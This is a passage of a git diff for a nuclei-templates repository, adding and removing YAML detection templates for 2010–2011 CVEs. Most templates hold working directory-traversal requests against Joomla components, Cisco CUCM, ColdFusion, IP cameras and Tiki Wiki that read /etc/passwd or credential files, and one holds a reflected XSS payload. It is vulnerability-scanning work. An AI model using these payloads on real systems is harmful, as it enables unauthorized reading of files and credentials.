- - "{{BaseURL}}/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1977.yaml b/nuclei-templates/CVE-2010/cve-2010-1977.yaml
new file mode 100644
index 0000000000..71de2a9492
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1977.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1977
+
+info:
+ name: Joomla! Component J!WHMCS Integrator 1.5.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the J!WHMCS Integrator (com_jwhmcs) component 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12083
+ - https://www.cvedetails.com/cve/CVE-2010-1977
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1980.yaml b/nuclei-templates/CVE-2010/cve-2010-1980.yaml
new file mode 100644
index 0000000000..37219a9e71
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-1980.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1980
+
+info:
+ name: Joomla! Component Joomla! Flickr 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in joomlaflickr.php in the Joomla Flickr (com_joomlaflickr) component 1.0.3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12085
+ - https://www.cvedetails.com/cve/CVE-2010-1980
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-1982.yaml b/nuclei-templates/CVE-2010/cve-2010-1982.yaml
deleted file mode 100644
index f58840909d..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1982.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2010-1982
-info:
- name: Joomla! Component JA Voice 2.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the JA Voice (com_javoice) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/12121
- - https://www.cvedetails.com/cve/CVE-2010-1982
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-1983.yaml b/nuclei-templates/CVE-2010/cve-2010-1983.yaml
deleted file mode 100644
index 2c169b3f5c..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-1983.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-1983
-
-info:
- name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
- reference:
- - https://www.exploit-db.com/exploits/12055
- - https://www.cvedetails.com/cve/CVE-2010-1983
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-2033.yaml b/nuclei-templates/CVE-2010/cve-2010-2033.yaml
deleted file mode 100644
index 19eba6d68b..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-2033.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-2033
-
-info:
- name: Joomla Percha Categories Tree 0.6 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://packetstormsecurity.com/files/89654/Joomla-Percha-Categories-Tree-0.6-Local-File-Inclusion.html
- - https://www.cvedetails.com/cve/CVE-2010-2033
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_perchacategoriestree&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-2036.yaml b/nuclei-templates/CVE-2010/cve-2010-2036.yaml
deleted file mode 100644
index 9cbb501b85..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-2036.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-2036
-
-info:
- name: Joomla! Component Percha Fields Attach 1.0 - Directory Traversal
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Percha Fields Attach (com_perchafieldsattach) component 1.x for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/34004
- - https://www.cvedetails.com/cve/CVE-2010-2036
- tags: cve,cve2010,lfi,joomla
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-2050.yaml b/nuclei-templates/CVE-2010/cve-2010-2050.yaml
deleted file mode 100644
index 9aedcbfc20..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-2050.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-2050
-
-info:
- name: Joomla! Component MS Comment 0.8.0b - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Moron Solutions MS Comment (com_mscomment) component 0.8.0b for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
- reference: |
- - https://www.exploit-db.com/exploits/12611
- - https://www.cvedetails.com/cve/CVE-2010-2050
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-2128.yaml b/nuclei-templates/CVE-2010/cve-2010-2128.yaml
new file mode 100644
index 0000000000..cf019f95a3
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-2128.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-2128
+
+info:
+ name: Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JE Quotation Form (com_jequoteform) component 1.0b1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the view parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12607
+ - https://www.cvedetails.com/cve/CVE-2010-2128
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-2307.yaml b/nuclei-templates/CVE-2010/cve-2010-2307.yaml
deleted file mode 100644
index d23c7cfd89..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-2307.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2010-2307
-
-info:
- name: Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM - Directory Traversal
- author: daffainfo
- severity: high
- description: Multiple directory traversal vulnerabilities in the web server for Motorola SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow remote attackers to read arbitrary files via (1) "//" (multiple leading slash), (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
- reference:
- - https://www.securityfocus.com/bid/40550/info
- - https://nvd.nist.gov/vuln/detail/CVE-2010-2307
- tags: cve,cve2010,iot,lfi,motorola
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/../../etc/passwd"
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-2680.yaml b/nuclei-templates/CVE-2010/cve-2010-2680.yaml
deleted file mode 100644
index fa1dc916da..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-2680.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-2680
-
-info:
- name: Joomla! Component jesectionfinder - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the JExtensions JE Section/Property Finder (jesectionfinder) component for Joomla! allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the view parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/14064
- - https://www.cvedetails.com/cve/CVE-2010-2680
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-2857.yaml b/nuclei-templates/CVE-2010/cve-2010-2857.yaml
deleted file mode 100644
index 1478adabab..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-2857.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-2857
-
-info:
- name: Joomla! Component Music Manager - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Music Manager component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the cid parameter to album.html.
- reference: |
- - https://www.exploit-db.com/exploits/14274
- - https://www.cvedetails.com/cve/CVE-2010-2857
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-2861.yaml b/nuclei-templates/CVE-2010/cve-2010-2861.yaml
deleted file mode 100644
index 58f43f1fad..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-2861.yaml
+++ /dev/null
@@ -1,30 +0,0 @@
-id: CVE-2010-2861
-
-info:
- name: Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
- author: pikpikcu
- severity: high
- description: Multiple directory traversal vulnerabilities in the administrator console in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm, (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm in CFIDE/administrator/.
- reference:
- - https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
- - http://www.adobe.com/support/security/bulletins/apsb10-18.html
- tags: cve,cve2010,coldfusion,lfi,adobe
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en"
-
- matchers-condition: and
- matchers:
-
- - type: word
- words:
- - "rdspassword="
- - "encrypted="
- part: body
- condition: and
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-3203.yaml b/nuclei-templates/CVE-2010/cve-2010-3203.yaml
deleted file mode 100644
index 7f5245195e..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-3203.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-3203
-
-info:
- name: Joomla! Component PicSell 1.0 - Local File Disclosure
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.
- reference: |
- - https://www.exploit-db.com/exploits/14845
- - https://www.cvedetails.com/cve/CVE-2010-3203
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-4231.yaml b/nuclei-templates/CVE-2010/cve-2010-4231.yaml
deleted file mode 100644
index 58e8e65051..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-4231.yaml
+++ /dev/null
@@ -1,26 +0,0 @@
-id: CVE-2010-4231
-
-info:
- name: Camtron CMNC-200 IP Camera - Directory Traversal
- author: daffainfo
- severity: high
- description: The CMNC-200 IP Camera has a built-in web server that is enabled by default. The server is vulnerable to directory transversal attacks, allowing access to any file on the camera file system.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2010-4231
- - https://www.exploit-db.com/exploits/15505
- tags: cve,cve2010,iot,lfi,camera
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/../../../../../../../../../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-4239.yaml b/nuclei-templates/CVE-2010/cve-2010-4239.yaml
new file mode 100644
index 0000000000..7f6b76880d
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-4239.yaml
@@ -0,0 +1,45 @@
+id: CVE-2010-4239
+
+info:
+ name: Tiki Wiki CMS Groupware 5.2 - Local File Inclusion
+ author: 0x_akoko
+ severity: critical
+ description: Tiki Wiki CMS Groupware 5.2 is susceptible to a local file inclusion vulnerability.
+ impact: |
+ The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation.
+ remediation: |
+ Upgrade Tiki Wiki CMS Groupware to a version that is not affected by the CVE-2010-4239 vulnerability.
+ reference:
+ - https://dl.packetstormsecurity.net/1009-exploits/tikiwiki52-lfi.txt
+ - https://www.openwall.com/lists/oss-security/2010/11/22/9
+ - https://security-tracker.debian.org/tracker/CVE-2010-4239
+ - https://nvd.nist.gov/vuln/detail/CVE-2010-4239
+ - https://access.redhat.com/security/cve/cve-2010-4239
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2010-4239
+ cwe-id: CWE-20
+ epss-score: 0.03038
+ epss-percentile: 0.90751
+ cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:5.2:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: tiki
+ product: tikiwiki_cms\/groupware
+ tags: cve,cve2010,tikiwiki,lfi,tiki
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/tiki-jsplugin.php?plugin=x&language=../../../../../../../../../../windows/win.ini"
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "bit app support"
+ - "fonts"
+ - "extensions"
+ condition: and
+# digest: 4a0a00473045022100b5b334a2fec00cf5a3aecc1339951bf57de03095d5f4265c23450b3a0c64bb5c02206338a21c9a89350f86820ccc9f08c7d37697834a200669fe085df7763d730318:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-4282.yaml b/nuclei-templates/CVE-2010/cve-2010-4282.yaml
deleted file mode 100644
index 889195c6eb..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-4282.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-4282
-
-info:
- name: phpShowtime 2.0 - Directory Traversal
- author: daffainfo
- severity: high
- description: Multiple directory traversal vulnerabilities in Pandora FMS before 3.1.1 allow remote attackers to include and execute arbitrary local files via (1) the page parameter to ajax.php or (2) the id parameter to general/pandora_help.php, and allow remote attackers to include and execute, create, modify, or delete arbitrary local files via (3) the layout parameter to operation/agentes/networkmap.php.
- reference:
- - https://www.exploit-db.com/exploits/15643
- - https://www.cvedetails.com/cve/CVE-2010-4282
- tags: cve,cve2010,lfi,joomla,phpshowtime
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/pandora_console/ajax.php?page=../../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
diff --git a/nuclei-templates/CVE-2010/cve-2010-4719.yaml b/nuclei-templates/CVE-2010/cve-2010-4719.yaml
new file mode 100644
index 0000000000..145fed21d3
--- /dev/null
+++ b/nuclei-templates/CVE-2010/cve-2010-4719.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-4719
+
+info:
+ name: Joomla! Component JRadio - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in JRadio (com_jradio) component before 1.5.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/15749
+ - https://www.cvedetails.com/cve/CVE-2010-4719
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-4769.yaml b/nuclei-templates/CVE-2010/cve-2010-4769.yaml
deleted file mode 100644
index 3de9150cf4..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-4769.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-4769
-
-info:
- name: Joomla! Component Jimtawl 1.0.2 - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in the Jimtawl (com_jimtawl) component 1.0.2 Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the task parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/15585
- - https://www.cvedetails.com/cve/CVE-2010-4769
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2010/cve-2010-5286.yaml b/nuclei-templates/CVE-2010/cve-2010-5286.yaml
deleted file mode 100644
index e27c4edeb5..0000000000
--- a/nuclei-templates/CVE-2010/cve-2010-5286.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2010-5286
-
-info:
- name: Joomla! Component Jstore - 'Controller' Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in Jstore (com_jstore) component for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
- reference:
- - https://www.exploit-db.com/exploits/34837
- - https://www.cvedetails.com/cve/CVE-2010-5286
- tags: cve,cve2010,joomla,lfi
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2011/cve-2011-0049.yaml b/nuclei-templates/CVE-2011/CVE-2011-0049.yaml
similarity index 100%
rename from nuclei-templates/CVE-2011/cve-2011-0049.yaml
rename to nuclei-templates/CVE-2011/CVE-2011-0049.yaml
diff --git a/nuclei-templates/CVE-2011/CVE-2011-2744.yaml b/nuclei-templates/CVE-2011/CVE-2011-2744.yaml
new file mode 100644
index 0000000000..c303e15090
--- /dev/null
+++ b/nuclei-templates/CVE-2011/CVE-2011-2744.yaml
@@ -0,0 +1,33 @@
+id: CVE-2011-2744
+
+info:
+ name: Chyrp 2.x - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: A directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
+ reference:
+ - https://www.exploit-db.com/exploits/35945
+ - https://www.cvedetails.com/cve/CVE-2011-2744
+ - http://www.openwall.com/lists/oss-security/2011/07/13/6
+ - http://secunia.com/advisories/45184
+ classification:
+ cve-id: CVE-2011-2744
+ tags: cve,cve2011,lfi,chyrp
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0:"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/02/18
diff --git a/nuclei-templates/CVE-2011/CVE-2011-3315.yaml b/nuclei-templates/CVE-2011/CVE-2011-3315.yaml
deleted file mode 100644
index f5589ecd62..0000000000
--- a/nuclei-templates/CVE-2011/CVE-2011-3315.yaml
+++ /dev/null
@@ -1,33 +0,0 @@
-id: CVE-2011-3315
-
-info:
- name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
- author: daffainfo
- severity: high
- description: A directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
- reference:
- - https://www.exploit-db.com/exploits/36256
- - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-uccx
- - http://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20111026-cucm
- remediation: Upgrade to a supported version.
- classification:
- cve-id: CVE-2011-3315
- tags: cve,cve2011,lfi,cisco
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0:"
-
- - type: status
- status:
- - 200
-
-# Enhanced by mp on 2022/02/18
diff --git a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml b/nuclei-templates/CVE-2011/CVE-2011-4336.yaml
deleted file mode 100644
index 385c2af2dc..0000000000
--- a/nuclei-templates/CVE-2011/CVE-2011-4336.yaml
+++ /dev/null
@@ -1,45 +0,0 @@
-id: CVE-2011-4336
-
-info:
- name: Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting
- author: pikpikcu
- severity: medium
- description: Tiki Wiki CMS Groupware 7.0 is vulnerable to cross-site scripting via the GET "ajax" parameter to snarf_ajax.php.
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2011-4336
- - http://web.archive.org/web/20210328232945/https://www.securityfocus.com/bid/48806/info
- - https://seclists.org/bugtraq/2011/Nov/140
- remediation: Upgrade to a supported version.
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.1
- cve-id: CVE-2011-4336
- cwe-id: CWE-79
- cpe: cpe:2.3:a:tiki:tikiwiki_cms\/groupware:*:*:*:*:*:*:*:*
- epss-score: 0.00182
- tags: seclists,cve,cve2011,xss,tikiwiki
- metadata:
- max-request: 1
-
-http:
- - method: GET
- path:
- - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
-
- matchers-condition: and
- matchers:
- - type: word
- words:
- - ''
- part: body
-
- - type: status
- status:
- - 200
-
- - type: word
- part: header
- words:
- - text/html
-
-# Enhanced by mp on 2022/02/18
diff --git a/nuclei-templates/CVE-2011/cve-2011-4624.yaml b/nuclei-templates/CVE-2011/CVE-2011-4624.yaml
similarity index 100%
rename from nuclei-templates/CVE-2011/cve-2011-4624.yaml
rename to nuclei-templates/CVE-2011/CVE-2011-4624.yaml
diff --git a/nuclei-templates/CVE-2011/cve-2011-5106.yaml b/nuclei-templates/CVE-2011/CVE-2011-5106.yaml
similarity index 100%
rename from nuclei-templates/CVE-2011/cve-2011-5106.yaml
rename to nuclei-templates/CVE-2011/CVE-2011-5106.yaml
diff --git a/nuclei-templates/CVE-2011/cve-2011-2744.yaml b/nuclei-templates/CVE-2011/cve-2011-2744.yaml
deleted file mode 100644
index 041e731693..0000000000
--- a/nuclei-templates/CVE-2011/cve-2011-2744.yaml
+++ /dev/null
@@ -1,27 +0,0 @@
-id: CVE-2011-2744
-
-info:
- name: Chyrp 2.x - Local File Inclusion
- author: daffainfo
- severity: high
- description: Directory traversal vulnerability in Chyrp 2.1 and earlier allows remote attackers to include and execute arbitrary local files via a ..%2F (encoded dot dot slash) in the action parameter to the default URI.
- reference:
- - https://www.exploit-db.com/exploits/35945
- - https://www.cvedetails.com/cve/CVE-2011-2744
- tags: cve,cve2011,lfi,chyrp
-
-requests:
- - method: GET
- path:
- - "{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"
-
- matchers-condition: and
- matchers:
-
- - type: regex
- regex:
- - "root:.*:0:0"
-
- - type: status
- status:
- - 200
\ No newline at end of file
diff --git a/nuclei-templates/CVE-2011/cve-2011-3315.yaml b/nuclei-templates/CVE-2011/cve-2011-3315.yaml
new file mode 100644
index 0000000000..855379ffba
--- /dev/null
+++ b/nuclei-templates/CVE-2011/cve-2011-3315.yaml
@@ -0,0 +1,25 @@
+id: CVE-2011-3315
+
+info:
+ name: Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in Cisco Unified Communications Manager (CUCM) 5.x and 6.x before 6.1(5)SU2, 7.x before 7.1(5b)SU2, and 8.x before 8.0(3), and Cisco Unified Contact Center Express (aka Unified CCX or UCCX) and Cisco Unified IP Interactive Voice Response (Unified IP-IVR) before 6.0(1)SR1ES8, 7.0(x) before 7.0(2)ES1, 8.0(x) through 8.0(2)SU3, and 8.5(x) before 8.5(1)SU2, allows remote attackers to read arbitrary files via a crafted URL, aka Bug IDs CSCth09343 and CSCts44049.
+ reference: https://www.exploit-db.com/exploits/36256
+ tags: cve,cve2011,lfi,cisco
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/nuclei-templates/CVE-2011/cve-2011-4336.yaml b/nuclei-templates/CVE-2011/cve-2011-4336.yaml
new file mode 100644
index 0000000000..1fe124e5d4
--- /dev/null
+++ b/nuclei-templates/CVE-2011/cve-2011-4336.yaml
@@ -0,0 +1,38 @@
+id: CVE-2011-4336
+
+info:
+ name: Tiki Wiki CMS Groupware 7.0 has XSS
+ author: pikpikcu
+ severity: medium
+ description: Tiki Wiki CMS Groupware 7.0 has XSS via the GET "ajax" parameter to snarf_ajax.php.
+ reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2011-4336
+ - https://www.securityfocus.com/bid/48806/info
+ - https://seclists.org/bugtraq/2011/Nov/140
+ tags: cve,cve2011,xss,tikiwiki
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.10
+ cve-id: CVE-2011-4336
+ cwe-id: CWE-79
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
